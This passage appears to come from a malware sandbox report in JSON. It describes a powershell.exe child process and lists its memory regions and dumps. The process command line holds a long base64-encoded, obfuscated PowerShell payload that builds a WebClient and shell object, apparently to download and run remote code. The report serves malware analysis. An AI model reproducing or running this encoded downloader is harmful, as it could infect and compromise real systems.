KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_2", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000432-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_432", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:23.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_433", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:23.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_434", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:23.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000435-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_435", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:23.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 571867136, "type": "region", "version": 1 }, "end_va": 572334079, "entry_point": 571867136, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_436", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 571867136, "timestamp": "00:00:23.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_437", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:23.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_438", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:23.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_439", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:23.450", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000440-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_440", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:00:23.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000441-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_441", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:23.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000442-addr_0x0000000000070000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_442", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:23.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_443", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:23.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_444", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:23.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_445", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:23.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_446", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:23.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 1507328, "filename": "\\Windows\\System32\\locale.nls", "id": "region_447", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:23.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1807482880, "type": "region", "version": 1 }, "end_va": 1807785983, "entry_point": 1807494740, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_448", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1807482880, "timestamp": "00:00:23.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947992064, "filename": "\\Windows\\System32\\atl.dll", "id": "region_449", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:00:23.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_450", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:23.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_451", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:23.537", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_452", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:23.537", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_453", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:23.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_454", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:23.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_455", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:23.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_456", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:23.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_457", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_458", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_459", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:23.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_460", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:23.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_461", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:23.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3244031, "entry_point": 0, "filename": null, "id": "region_462", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:23.636", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000463-addr_0x0000000000340000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_463", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:00:23.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_464", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:23.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_465", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:23.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_468", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:23.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_469", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:23.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1978367, "entry_point": 1966080, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_470", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 1966080, "timestamp": "00:00:23.905", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000471-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_471", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:23.912", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000472-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_472", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:23.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 